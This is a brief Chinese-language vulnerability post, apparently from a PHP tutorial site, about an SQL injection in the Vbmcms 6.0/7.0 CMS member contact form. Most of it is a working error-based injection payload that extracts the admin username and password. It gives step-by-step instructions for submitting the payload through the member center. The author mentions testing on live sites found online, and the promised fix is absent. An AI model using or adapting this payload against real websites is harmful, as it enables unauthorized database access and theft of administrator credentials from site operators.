网站地图    收藏   

主页 > 后端 > 网站安全 >

Vbmcms6.0&&7.0 update注入及修复 - 网站安全 -

来源:自学PHP网    时间:2015-04-16 23:14 作者: 阅读:

[导读] 最新版本7 0官网地址http: www vbmcms com index php目测全是教育站由于7 0版本收费 于是在网上下载了6 0免费版本的来看,还发现不少漏洞 各种insert 注入 各种update注入 但是我构造出语句后去网...

最新版本7.0
 
官网地址http://www.vbmcms.com/index.php
 
目测全是教育站
 
由于7.0版本收费  于是在网上下载了6.0免费版本的来看,还发现不少漏洞 各种insert 注入  各种update注入 但是我构造出语句后去网上找站测试都失败了  7.0补了很多
 
但是在修改联系方式这里没有过滤
 
漏洞文件\member\include\inc_base.php
这里都没有过滤直接传入SQ语句
 
那么随便选一个  选cname吧
 
构造语句
 
UPDATE `vb_member` SET qq = ’1141056911′, tel = ’15071810222′ ,cname = ‘ɵµõ’aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(userid,0x3a,pwd)) from my_admin limit 0,1),1,62)))a from information_schema.tables group by a)b)#’, email = ’1141056911@qq.com’ , sex = ‘男’ ERE userid = ‘Sunshie’
 
 
然后来到会员中心  在联系方式 吧这里的联系老师  或者性别改成’aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(userid,0x3a,pwd)) from my_admin limit 0,1),1,62)))a from information_schema.tables group by a)b)#(性别用谷歌审查元素修改)
 
然后点提交
 
然后密码就爆出来了
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论